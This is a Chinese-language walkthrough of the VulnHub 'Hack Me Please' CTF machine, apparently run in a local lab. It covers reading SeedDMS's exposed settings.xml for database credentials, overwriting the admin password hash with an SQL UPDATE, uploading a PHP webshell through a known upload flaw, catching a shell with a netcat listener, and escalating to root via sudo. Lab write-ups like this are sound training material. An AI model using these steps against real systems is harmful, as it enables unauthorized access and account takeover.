Hack Me Please靶机攻略（ubuntu_ctf）

靶机详情

靶机地址：https://www.vulnhub.com/entry/hack-me-please-1,731/。

这个靶机的目标是获得root权限。  靶机下载后安装好，选择NAT模式。

使用Kali作为此次的攻击机，同样选择NAT模式，使之与靶机相通。

信息收集

获取靶机ip：192.168.60.143

arp-scan -l

常规操作，扫描一下端口，目录，但是，这次扫不出来任何有价值的东西，看了一下大佬教程，原来要看js，寻找程序版本

通过main.js 我们获取到：

//make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/

意思就是，东西都在这里面呗http://192.168.60.143/seeddms51x/seeddms-5.1.22/

顺势我们获得一个后台登录地址：

http://192.168.60.143/seeddms51x/seeddms-5.1.22/out/out.ViewDocument.php?documentid=6

是SeedDMS的登录口，同时我们可以得到信息，版本是5.1.22。源码地址：https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/

尝试访问setting.xml 地址：http://192.168.60.143/seeddms51x/conf/settings.xml

<database dbDriver=\"mysql\" dbHostname=\"localhost\" dbDatabase=\"seeddms\" dbUser=\"seeddms\" dbPass=\"seeddms\" doNotCheckVersion=\"false\"> </database>

使用mysql登录试试这个密码，没想到确实登录进去了

mysql -h 192.168.60.143 -u seeddms -p seeddms

一共查到两个表tblUsers和users两个表有用户数据

尝试md5解密，半天解不出来，还是直接改一个方便，这里为了好记住，admin pwd改成了123456

update `seeddms`.`tblUsers` set `pwd`=\'e10adc3949ba59abbe56e057f20f883e\' where id=1;

渗透测试

成功登录网站，发现可以一个文件上传漏洞 https://www.exploit-db.com/exploits/47022

按照漏洞教程进行操作

在上传文件的地方，上传一个木马，查看id为6

开启监听：

nc lvvp 7777

按绝对地址访问该文件：http://192.168.60.143/seeddms51x/seeddms-5.1.22/data/1048576/6/1.php

成功获取监听

升级shell教程

Linux 反向 shell 升级为完全可用的 TTY shell

2022年3月30日 20:03

022611

之前查看user表里已经得到了saket的账号密码 1 | saket | saurav | Saket@#$1337

切换用户：su saket

查看saket用户的sudo权限，可以免密登录root

总结

1. 获取靶机ip
2. 端口扫描
3. 目录扫描
4. 查看js代码，获取程序版本
5. 查看程序源码，获取关键文件信息及相对文件地址
6. 得到数据库默认密码，链接数据库
7. 查看数据库，获取用户账号密码
8. 登录网站
9. 发现网站有文件上传漏洞
10. kali监听，获取用户信息
11. sudo提权root